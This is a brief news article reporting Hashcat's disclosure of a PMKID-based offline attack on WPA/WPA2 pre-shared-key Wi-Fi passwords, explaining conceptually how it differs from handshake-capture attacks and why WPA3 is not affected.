Hashcat describes new attack on wpa2

The makers of password cracking tool Hashcat have found a new technique that can be used for attacks on wpa psk passwords. Their attack uses the capture of the pairwise master key identifier, or pmkid.

According to Hashcat, the technique came to light during attempts to crack the security of the new wpa3 technique, the researchers write. The attack targets eapol’s rsni, or robust security network information element. Eapol stands for extensible authentication protocol over lan and is a technique that wpa and wpa2 use in the 4-way handshake. With this handshake, a client and an access point authenticate and agree on a session.

Part of rsn ie is the pmkid and this hash contains all the data to perform an offline attack on wpa psk passwords. According to the researchers, the major advantage of the new attack compared to previous wpa2 attacks such as Krack is that the deployment of a regular network user is no longer necessary and it is no longer necessary to wait for the 4-way handshake to be completed. Namely, the attacker communicates directly with the access point and the pmkid resides in a single eapol frame.

Since only the authentication process needs to be initiated, the method makes an attack to crack wpa pre-shared keys easier. Whether that cracking with Hascat, for example, is successful, then depends on the length and complexity of the Wi-Fi password. Many users use a simple and short password for their WiFi network or do not change the default password.

The method does not work when attacking the new wpa3. The successor to wpa2 uses a more secure authentication technique for handshakes, simultaneous authentication of equals, that is not based on pre-shared keys. This should prevent the offline cracking of WiFi passwords using a dictionary attack, so that users are protected, even with weak passwords.